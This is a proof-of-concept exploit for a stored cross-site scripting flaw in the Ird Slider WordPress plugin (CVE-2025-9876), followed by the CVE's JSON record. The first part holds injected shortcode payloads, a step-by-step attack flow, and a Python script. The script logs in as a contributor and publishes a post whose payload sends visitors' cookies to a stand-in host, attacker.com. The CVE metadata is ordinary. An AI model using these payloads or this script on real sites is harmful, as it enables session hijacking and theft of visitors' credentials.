CVE-2025-9876

<!-- Stored XSS PoC for CVE-2025-9876 - Ird Slider Plugin --> <!-- Inject the following shortcode into a post or page as a contributor-level user --> [irdslider title="<script>alert('XSS-'+document.cookie)</script>" description="<img src=x onerror=alert(document.domain)>"] <!-- Alternative payload using event handlers --> [irdslider title="test" link="javascript:alert('XSS')" image="<svg onload=alert(1)>"] <!-- Attack flow: 1. Attacker logs in as contributor or higher 2. Creates a new post/page containing malicious irdslider shortcode 3. Submits the post for review or publishes it 4. When any user visits the page, the injected script executes 5. Attacker can steal cookies, redirect users, or perform actions on behalf of victims --> <!-- Python exploit example to automate cookie stealing --> import requests target_url = "http://target-wordpress-site.com" attacker_server = "http://attacker.com/steal" payload = '[irdslider title=\"<script>fetch(\'{server}?c=\'+document.cookie)</script>\"]'.format(server=attacker_server) # Login as contributor session = requests.Session() login_data = { 'log': 'contributor_username', 'pwd': 'contributor_password', 'wp-submit': 'Log In', 'redirect_to': '', 'testcookie': '1' } session.post(f"{target_url}/wp-login.php", data=login_data) # Create post with malicious shortcode post_data = { 'post_title': 'Interesting Article', 'post_content': payload, 'post_status': 'publish', 'post_type': 'post' } session.post(f"{target_url}/wp-admin/post-new.php", data=post_data)

{"cve": {"id": "CVE-2025-9876", "sourceIdentifier": "[email protected]", "published": "2025-10-03T12:15:49.633", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Ird Slider plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'irdslider' shortcode in all versions up to, and including, 1.0.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/ird-slider/tags/1.0.2/irdslider.php#L221", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/44362245-a3af-46a5-b35b-eabd5f537fca?source=cve", "source": "[email protected]"}]}}